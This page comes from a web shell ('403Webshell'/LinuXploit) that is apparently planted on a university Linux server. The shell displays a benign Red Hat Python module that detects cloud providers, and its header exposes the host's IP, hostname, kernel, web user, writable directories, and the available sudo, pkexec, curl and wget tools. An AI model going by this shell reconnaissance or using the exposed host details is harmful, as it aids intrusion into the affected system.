403Webshell
Server IP : 172.24.0.40  /  Your IP : 216.73.216.10
Web Server : Apache
System : Linux dbweb26.ust.edu.ph 4.18.0-513.5.1.el8_9.x86_64 #1 SMP Fri Sep 29 05:21:10 EDT 2023 x86_64
User : apache ( 48)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib64/python3.6/site-packages/cloud_what/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib64/python3.6/site-packages/cloud_what/provider.py
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#

"""
This module contains several utils used for VMs running on clouds
"""

from typing import Union, Tuple, List
import enum
import logging

try:
    # When subscription-manager is installed, then use facts collectors from this package
    from rhsmlib.facts.host_collector import HostCollector
    from rhsmlib.facts.custom import CustomFactsCollector
except ImportError:
    # When it is not possible to import host and custom collector,
    # then import own minimalistic collectors
    from cloud_what.fact_collector import MiniHostCollector as HostCollector
    from cloud_what.fact_collector import MiniCustomFactsCollector as CustomFactsCollector

from cloud_what._base_provider import BaseCloudProvider

from cloud_what.providers.aws import AWSCloudProvider
from cloud_what.providers.azure import AzureCloudProvider
from cloud_what.providers.gcp import GCPCloudProvider


# List of classes with supported cloud providers
CLOUD_PROVIDERS = [
    AWSCloudProvider,
    AzureCloudProvider,
    GCPCloudProvider
]


log = logging.getLogger(__name__)


class DetectionMethod(enum.Flag):
    """
    Enumeration of allowed methods used for detection of cloud providers
    """

    # When this flag is set, then strong method will be used
    STRONG = enum.auto()

    # When this flag is set, then heuristic method will be used
    HEURISTIC = enum.auto()

    # All flags together
    ALL = HEURISTIC | STRONG


def gather_system_facts() -> dict:
    """
    Try to gather system facts necessary for detection of cloud provider
    :return: Dictionary with system facts
    """
    facts = {}

    # Gather only basic information about hardware, virtualization and custom facts
    facts.update(HostCollector().get_all())

    # When cloud provider will change information provided by SM BIOS, then
    # customers will be able to create simple workaround using custom facts.
    facts.update(CustomFactsCollector().get_all())

    return facts


def _get_cloud_providers(
        facts: dict = None,
        threshold: float = 0.5,
        methods: DetectionMethod = DetectionMethod.ALL
) -> Tuple[list, bool]:
    """
    This method tries to detect cloud providers and return list of possible cloud providers
    :param facts: Dictionary with system facts
    :param threshold: Threshold using for detection of cloud provider
    :param methods: The flag of methods used for detecting of cloud providers
    :return: List of cloud providers
    """

    if facts is None:
        facts = gather_system_facts()

    # Create instances of all supported cloud providers
    cloud_providers = [cls(facts) for cls in CLOUD_PROVIDERS]

    log.debug('Trying to detect cloud provider')

    cloud_list = []
    if DetectionMethod.STRONG in methods:
        # First try to detect cloud providers using strong signs
        cloud_provider: BaseCloudProvider
        for cloud_provider in cloud_providers:
            cloud_detected = cloud_provider.is_running_on_cloud()
            if cloud_detected is True:
                cloud_list.append(cloud_provider)

        # When only one cloud provider was detected, then return this cloud provider
        if len(cloud_list) == 1:
            log.debug('Detected one cloud provider using strong signs: {provider}'.format(
                provider=cloud_list[0].CLOUD_PROVIDER_ID)
            )
            return cloud_list, True
        elif len(cloud_list) == 0:
            log.debug('No cloud provider detected using strong signs')
        elif len(cloud_list) > 1:
            log.error('More than one cloud provider detected using strong signs ({providers})'.format(
                providers=", ".join([cloud_provider.CLOUD_PROVIDER_ID for cloud_provider in cloud_list])
            ))
    else:
        log.debug('Skipping detection of cloud provider using strong signs')

    if DetectionMethod.HEURISTIC in methods:
        # When no cloud provider detected using strong signs, because behavior of cloud providers
        # has changed, then try to detect cloud provider using some heuristics
        cloud_list = []
        for cloud_provider in cloud_providers:
            probability: float = cloud_provider.is_likely_running_on_cloud()
            # We have to filter out VMs, where is low probability that it runs on public cloud,
            # because it would cause further attempts to contact IMDS servers of cloud providers.
            # Default value 0.5 was just estimated from observation of existing data returned
            # by cloud providers.
            log.debug(f'Cloud provider {cloud_provider.CLOUD_PROVIDER_ID} has probability: {probability}')
            if probability > threshold:
                cloud_list.append((probability, cloud_provider))
        # Sort list according only probability (provider with the highest probability first)
        cloud_list.sort(key=lambda x: x[0], reverse=True)
        # We care only about order, not probability in the result (filter probability out)
        cloud_list = [item[1] for item in cloud_list]

        if len(cloud_list) == 0:
            log.debug('No cloud provider detected using heuristics')
        else:
            log.debug('Following cloud providers detected using heuristics: {providers}'.format(
                providers=', '.join([cloud_provider.CLOUD_PROVIDER_ID for cloud_provider in cloud_list])
            ))
    else:
        log.debug('Skipping detection of cloud providers using heuristic')

    return cloud_list, False


def get_cloud_provider(
        facts: dict = None,
        threshold: float = 0.5,
        methods: DetectionMethod = DetectionMethod.ALL
) -> Union[
    BaseCloudProvider, AWSCloudProvider, AzureCloudProvider, GCPCloudProvider, None
]:
    """
    This method tries to detect cloud provider and return corresponding instance of
    cloud provider.
    :param facts: Dictionary with system facts
    :param threshold: Threshold used for heuristic detection of cloud provider
    :param methods: The flag of methods used for detecting of cloud providers
    :return: Instance of cloud provider or None
    """
    cloud_list, strong_sign = _get_cloud_providers(facts, threshold, methods)

    # When only one cloud provider detected using strong signs, then it is not
    # necessary to try to gather metadata from cloud provider
    if len(cloud_list) == 1 and strong_sign is True:
        return cloud_list[0]

    if len(cloud_list) > 0:
        # Try to get metadata from cloud provider and return first cloud provider, which is
        # able to get metadata. Note: gathered metadata are cached in-memory. Thus another attempt
        # of gathering metadata will not hit server, but metadata will be read from in-memory cache.
        for cloud_provider in cloud_list:
            metadata = cloud_provider.get_metadata()
            if metadata is not None:
                log.info('Metadata gathered from cloud provider detected using heuristics: {provider}'.format(
                    provider=cloud_provider.CLOUD_PROVIDER_ID)
                )
                return cloud_provider

        log.debug('Unable to get metadata from any cloud provider detected using heuristics')

    return None


def detect_cloud_provider(
        facts: dict = None,
        threshold: float = 0.5,
        methods: DetectionMethod = DetectionMethod.ALL
) -> List[str]:
    """
    This method tries to detect cloud provider using hardware information provided by dmidecode.
    When there is strong sign that the VM is running on one of the cloud provider, then return
    list containing only one provider. When there is no strong sign of one cloud provider, then
    try to detect cloud provider using heuristics methods. In this case this method will return
    list of all cloud providers sorted according detected probability
    :param facts: dictionary of facts. When no facts are provided, then hardware, virtualization
        and custom facts are gathered.
    :param threshold: Threshold used for heuristic detection of cloud provider
    :param methods: The flag of methods used for detection of cloud providers (possible enumerates
        are following in DetectionMethod). When only STRONG is listed, then detection is
        performed only using strong signs. When only HEURISTIC is listed, then only heuristics
        detections is used. When both methods are listed, then this method tries to use detection
        using strong signs first and if no cloud provider is detected, then it falls back to
        heuristics detection.
    :return: List of string representing detected cloud providers. E.g. ['aws'] or ['aws', 'gcp']
    """

    cloud_list, strong_sign = _get_cloud_providers(facts, threshold, methods)

    # We care only about IDs of cloud providers in this method
    cloud_list = [cloud_provider.CLOUD_PROVIDER_ID for cloud_provider in cloud_list]

    return cloud_list


# Some temporary smoke testing code. You can test this module using:
# sudo PYTHONPATH=./src python3 -m cloud_what.provider
if __name__ == '__main__':
    import sys

    root = logging.getLogger()
    root.setLevel(logging.DEBUG)

    handler = logging.StreamHandler(sys.stdout)
    handler.setLevel(logging.DEBUG)
    formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
    handler.setFormatter(formatter)
    root.addHandler(handler)

    # Try to detect cloud provider with facts provided by rhsmlib.facts
    _detector_result = detect_cloud_provider()
    print(f'>>> debug <<< detector result: {_detector_result}')

    # Try to detect cloud provider using own detector
    from cloud_what.fact_collector import MiniHostCollector
    collector = MiniHostCollector()
    _facts = collector.get_all()
    _detector_result = detect_cloud_provider(_facts)
    print(f'>>> debug <<< detector result (minimalistic): {_detector_result}')

Youez - 2016 - github.com/yon3zu
LinuXploit